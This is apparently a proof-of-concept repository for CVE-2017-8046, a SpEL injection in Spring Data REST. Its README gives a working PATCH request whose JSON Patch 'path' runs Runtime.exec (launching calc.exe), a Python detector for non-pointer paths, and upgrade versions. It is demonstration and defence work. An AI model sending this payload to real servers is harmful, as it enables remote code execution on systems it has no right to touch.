Description
SPRING DATA REST CVE-2017-8046 DEMO
Readme
# Spring Data REST CVE-2017-8046 demo test
Please UPGRADE Spring Data REST NOW.
## steps
* Start this application
* Create a test instance
```http
POST /entityPersons/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache

{
"firstName":"f2"
}
```
* Exploit the SpEL injection; this launches C:\Windows\system32\calc.exe
```http
PATCH /entityPersons/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache

[
{
"op":"test",
"path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[] {67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101} ))",
"value":""
}
]
```
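
The PATCH request above works because the `path` member is not a JSON Pointer at all, so a request-side check can flag such bodies before they reach an unpatched service. The following is an added example, not code from this repository or from Spring: it validates the `path` and `from` members of an `application/json-patch+json` body against RFC 6901 syntax plus a conservative segment allow-list. The function name, the allow-list and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# RFC 6901 JSON Pointer: empty, or "/"-prefixed segments in which "~" may
# only appear as the escapes "~0" and "~1".
POINTER = re.compile(r"(/([^/~]|~[01])*)*")
# Assumption: entity properties are Java identifiers; array positions are
# digits or "-". Anything else in a segment is reported.
SEGMENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*|\d+|-")

def suspicious_paths(body: str) -> list[str]:
    """Return findings for one application/json-patch+json request body."""
    try:
        ops = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    if not isinstance(ops, list):
        return ["JSON Patch document must be an array"]
    findings = []
    for i, op in enumerate(ops):
        if not isinstance(op, dict):
            findings.append(f"op[{i}]: not an object")
            continue
        if "path" not in op:
            findings.append(f"op[{i}].path: missing")
        for field in ("path", "from"):
            if field not in op:
                continue
            value = op[field]
            if not isinstance(value, str) or not POINTER.fullmatch(value):
                findings.append(f"op[{i}].{field}: not a JSON Pointer")
            elif any(not SEGMENT.fullmatch(s) for s in value.split("/")[1:]):
                findings.append(f"op[{i}].{field}: unexpected characters in segment")
    return findings

# Constructed sample bodies (not captured traffic).
BENIGN = '[{"op":"replace","path":"/firstName","value":"f3"}]'
EXPRESSION_LIKE = '[{"op":"test","path":"T(java.lang.Math).abs(1)","value":""}]'
ODD_SEGMENT = '[{"op":"replace","path":"/first(Name)","value":"x"}]'

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("expression-like", EXPRESSION_LIKE),
                       ("odd segment", ODD_SEGMENT)]:
        print(name, suspicious_paths(body))
```

A check like this is a stopgap for detection or filtering; the fix is the upgrade listed below.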
## upgrade to
* Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
* Spring Boot 2.0.0.M4
* Spring Data release train Kay-RC3

Spring Boot 1.5.7.RELEASE uses `spring data rest 2.6.7`, but the 1.4.x line does not upgrade its Spring Data REST version.
File Snapshot
```
[4.0K] /data/pocs/0dc87e9ebeed247599c11374d6c585165d1e3fd8
├── [6.3K] mvnw
├── [4.9K] mvnw.cmd
├── [1.9K] pom.xml
├── [ 978] README.md
└── [4.0K] src
    ├── [4.0K] main
    │   ├── [4.0K] java
    │   │   └── [4.0K] org
    │   │       └── [4.0K] fornever
    │   │           └── [4.0K] cve
    │   │               ├── [ 946] CVEApplication.java
    │   │               ├── [1.5K] EntityPerson.java
    │   │               └── [ 193] PersonRepository.java
    │   └── [4.0K] resources
    │       └── [   0] application.yml
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] org
                └── [4.0K] fornever
                    └── [4.0K] cve
                        └── [ 330] CVEApplicationTests.java

12 directories, 9 files
```